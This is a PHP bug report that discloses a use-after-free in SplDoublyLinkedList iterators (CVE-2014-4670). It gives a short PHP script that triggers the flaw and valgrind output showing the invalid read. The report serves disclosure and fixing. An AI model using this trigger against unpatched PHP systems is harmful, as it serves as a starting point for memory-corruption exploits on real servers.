[2014-06-29 14:54 UTC] research at insighti dot org

Description:
------------
SPL provides a set of iterators to traverse over objects (including internal iterators).
Changes in the object are not projected to the object iterators.
This results in iterators pointing to freed memory.
Calling next on the iterator triggers use-after-free.

Please use CVE-2014-4670 for this bug.

Test script:
---------------
<?php
$list = new SplDoublyLinkedList();
$list->push('a');
$list->push('b');

$list->rewind();
$list->offsetUnset(0);
$list->push('c');
$list->offsetUnset(0);
$list->next();

Actual result:
--------------
$ USE_ZEND_ALLOC=0 valgrind /opt/php/5.5.14/bin/php test.php
==14274== Memcheck, a memory error detector
==14274== Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.
==14274== Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info
==14274== Command: /opt/php/5.5.14/bin/php test.php
==14274==
==14274== Invalid read of size 4
==14274==    at 0x8367BCC: spl_dllist_it_helper_move_forward (spl_dllist.c:989)
==14274==    by 0x852E1B1: zend_do_fcall_common_helper_SPEC (zend_vm_execute.h:550)
==14274==    by 0x84F0935: execute_ex (zend_vm_execute.h:363)
==14274==    by 0x8488C71: zend_execute_scripts (zend.c:1316)
==14274==    by 0x842943A: php_execute_script (main.c:2506)
==14274==    by 0x8531447: do_cli (php_cli.c:994)
==14274==    by 0x808149B: main (php_cli.c:1378)
==14274==  Address 0x716b748 is 8 bytes inside a block of size 16 free'd
==14274==    at 0x402750C: free (vg_replace_malloc.c:427)
==14274==    by 0x83688FF: zim_spl_SplDoublyLinkedList_offsetUnset (spl_dllist.c:922)
==14274==    by 0x852E1B1: zend_do_fcall_common_helper_SPEC (zend_vm_execute.h:550)
==14274==    by 0x84F0935: execute_ex (zend_vm_execute.h:363)
==14274==    by 0x8488C71: zend_execute_scripts (zend.c:1316)
==14274==    by 0x842943A: php_execute_script (main.c:2506)
==14274==    by 0x8531447: do_cli (php_cli.c:994)
==14274==    by 0x808149B: main (php_cli.c:1378)